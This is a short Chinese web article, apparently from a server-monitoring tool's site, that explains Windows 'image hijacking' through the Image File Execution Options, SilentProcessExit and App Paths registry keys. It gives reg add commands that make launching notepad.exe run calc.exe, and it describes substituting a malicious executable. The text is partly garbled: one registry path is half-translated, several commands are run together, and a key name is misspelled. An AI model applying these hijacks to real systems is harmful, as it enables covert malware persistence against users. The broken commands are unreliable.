图片劫持，图片劫持的玩法

栏目：IIS7网站监控 时间：2020-11-05 10:44

      劫持对应的程序后，打开该程序运行的是别的程序，运行A.exe打开的则是CALC.exe
 

      放置路径：HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image文件执行选项
 

      用法：在调试路径下创建一个项，项必须要劫持的exe名称，并在创建一个调试器的键值，键值填充运行的恶意EXE。或者在已经创建的项里创建调试器键填入键值，运行那个exe就会被劫持
 

      IIS7服务器监控工具可以做到实时检测网站是否打得开、域名是否被墙、网站是否被劫持，网站被黑、被挂黑链、被挂非法信息。

      下载地址：IIS7服务器监控工具
 

 

      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v Debugger /t REG_SZ /d C:\Windows\System32\calc.exe

 

      触发路径：
 

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<劫持的exe名称>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\<劫持的exe名称>
 

      劫持notepad.exe示例：
 

      reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" /v notepad.exe /t REG_DWORD /d 512reg add   

      "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /t REG_SZ /d C:\Windows\System32\calc.exereg add

      "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1

 

      代替映像劫持的注册表路径
 

      HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\<要劫持的exe名>
 

      Defualt键值要运行的恶意exe路径